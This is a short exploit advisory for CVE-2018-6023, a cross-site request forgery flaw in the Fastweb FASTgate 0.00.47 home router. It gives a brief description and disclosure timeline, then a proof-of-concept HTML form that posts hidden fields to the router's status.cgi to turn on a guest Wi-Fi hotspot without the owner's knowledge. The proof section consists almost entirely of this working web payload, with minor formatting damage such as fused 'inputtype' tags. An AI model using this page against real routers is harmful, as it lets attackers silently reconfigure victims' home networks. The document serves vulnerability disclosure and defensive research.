# Exploit Title: Fastweb FASTgate 0.00.47 CSRF# Date: 09-05-2018# Exploit Authors: Raffaele Sabato# Contact: https://twitter.com/syrion89# Vendor: Fastweb# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/# Version: 0.00.47# CVE: CVE-2018-6023
I DESCRIPTION
========================================================================
An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc.
The vulnerability was disclosed to Fastweb on 19 January 2018.
Fastweb independently patched customer devices with non-vulneable version .67from December 2017 thru March 2018.
II PROOF OF CONCEPT
========================================================================## Activate Gues Wi-Fi:<html><body><script>history.pushState('','','/')</script><form action="http://192.168.1.254/status.cgi"><inputtype="hidden" name="_" value="1516312144136"/><inputtype="hidden" name="act" value="nvset"/><inputtype="hidden" name="hotspot_broadcast_ssid" value="1"/><inputtype="hidden" name="hotspot_enable" value="1"/><inputtype="hidden" name="hotspot_filtering" value="all"/><inputtype="hidden" name="hotspot_security" value="WPA2PSK"/><inputtype="hidden" name="hotspot_ssid" value="GUEST-Test"/><inputtype="hidden" name="hotspot_timeout" value="-1"/><inputtype="hidden" name="service" value="wl_guestaccess"/><inputtype="submit" value="Submit request"/></form></body></html>
III REFERENCES
========================================================================
http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/
